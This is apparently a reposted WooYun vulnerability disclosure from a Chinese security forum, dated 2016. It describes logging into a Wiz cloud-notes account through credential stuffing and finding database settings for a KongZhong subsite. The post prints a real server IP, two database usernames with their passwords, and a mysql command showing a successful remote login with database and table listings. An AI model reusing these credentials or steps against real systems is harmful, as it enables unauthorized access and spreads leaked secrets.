HanDs
NO.2

[7月漏洞公开] wiz笔记泄漏信息之空中网某站数据库泄露 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

程序员的错,不要把敏感信息存在云笔记不加密!!!

详细说明:

http://wooyun.org/bugs/wooyun-2016-0205007

利用撞出来的帐号登陆

1.png



看了看,有个笔记比较新,吸引人

22222.png



看到了配置信息,是空中网的子站,访问182.254.247.126

33.png



百度了下空中网

code 区域
www.kongzhong.com



流量挺大

code 区域
root/cdb_outerroot
mysqld/654321*a





code 区域
mysql -h 182.254.247.126 -u root -p
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'220.250.52.82' (using password: YES)



root无法远程登陆

试试看另一个帐号

code 区域
mysql -h 182.254.247.126 -u mysqld -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 476976
Server version: 5.1.73 Source distribution

Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>



成功登陆了

漏洞证明:

code 区域
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| daokong |
| daokong_statistic |
| mysql |
| test |
+--------------------+
5 rows in set (0.03 sec)



code 区域
mysql> use daokong
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables
-> ;
+----------------------------+
| Tables_in_daokong |
+----------------------------+
| achieve |
| black_list |
| cdk_code |
| cdk_used_role |
| container |
| data_bigint |
| data_int |
| data_vector_int |
| equipments |
| family |
| family_temple |
| familywar |
| hefu |
| hiddentreasure |
| leitai |
| mail_envelope |
| mail_info |
| mail_roleinfo |
| mail_task |
| maxids |
| pay |
| pet |
| qqh |
| resourcereturn |
| reward_task |
| rides |
| role |
| role_activity |
| role_ai |
| role_buff |
| role_center_hiddentreasure |
| role_center_jinji_exp |
| role_center_magic_tower |
| role_center_top_jinji |
| role_controlworld_award |
| role_corps |
| role_corps_skill |
| role_crossdistrict |
| role_doworld_msg |
| role_emperor_award_msg |
| role_employ |
| role_family |
| role_fatalityaltar_award |
| role_fish |
| role_friend_panel |
| role_garden |
| role_goldtree |
| role_king_award_msg |
| role_knifes |
| role_knifes_recast |
| role_last_scene |
| role_level_fuben_box |
| role_lsww_msg |
| role_magic_tower |
| role_maid |
| role_offline_data |
| role_offline_msg |
| role_pet_atta |
| role_pet_skill |
| role_qiecuo |
| role_settings |
| role_shop |
| role_skills |
| role_skills_hotkeys |
| role_tower |
| role_tower_battleinfo |
| server_bigint |
| server_int |
| server_text |
| server_vector_int |
| serverlist |
| task |
| tmp_center_data |
| tmp_data |
+----------------------------+
74 rows in set (0.03 sec)



但是无法查看内容

修复方案:

敏感信息加密存放


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
wiz 笔记泄漏信息之空中网某站数据库泄露
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组